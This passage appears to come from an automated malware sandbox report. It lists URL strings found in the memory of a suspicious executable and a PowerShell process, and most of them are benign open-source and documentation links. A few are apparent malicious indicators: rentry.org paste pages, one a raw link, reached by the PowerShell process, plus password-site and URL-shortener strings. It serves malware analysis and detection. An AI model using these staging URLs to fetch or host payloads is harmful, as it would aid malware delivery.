                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/distributed_point_functions
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/google-api-cpp-client/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/pprof/tree/master/proto
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/private-join-and-compute
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/protobuf
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/re2
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ruy
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/securemessage
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/sentencepiece
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/shell-encryption
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ukey2
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wicked-good-xpath
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/woff2
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wuffs-mirror-release-c
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/xnnpack
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/intel/libva
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jsdom/webidl-conversions
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jsdom/webidl-conversions/blob/master/LICENSE.md.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/2025.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/43714
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/44004#discussion_r930958420
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/46161
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf-javascript
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/requests/toolbelt
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/simplejson/simplejson
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/models
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tensorflow
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/text.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tflite-support
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/test262-utils/test262-harness-py
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasdk/wasmparser
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/xiph/rnnoise
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zeux/volk
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zorkow/speech-rule-engine
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
                        Source: powershell.exe, 00000001.00000002.2392868627.000001234411E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m-
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/web-messaging.html#broadcasting-to-other-browsing-contexts
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/155487768
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/288119108
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292282210
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899forceMinimumMaxVertexAttributesForce
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/309028728
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/315836169
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/328837151
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
                        Source: powershell.exe, 00000001.00000002.2376367107.000001233BD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://opensource.apple.com/source/xnu/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comCuenta
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comcuenta
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://polymer-library.polymer-project.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/pyparsing
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/six/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/pyfakefs
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/webapp2
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://quiche.googlesource.com/quiche
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232CC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232C8AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/lem61111
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232C701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/lem6111111111
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232C8AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/lem61111111111/raw
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shorturl.at/drFY7)
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sizzlejs.com/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-rbs-pull
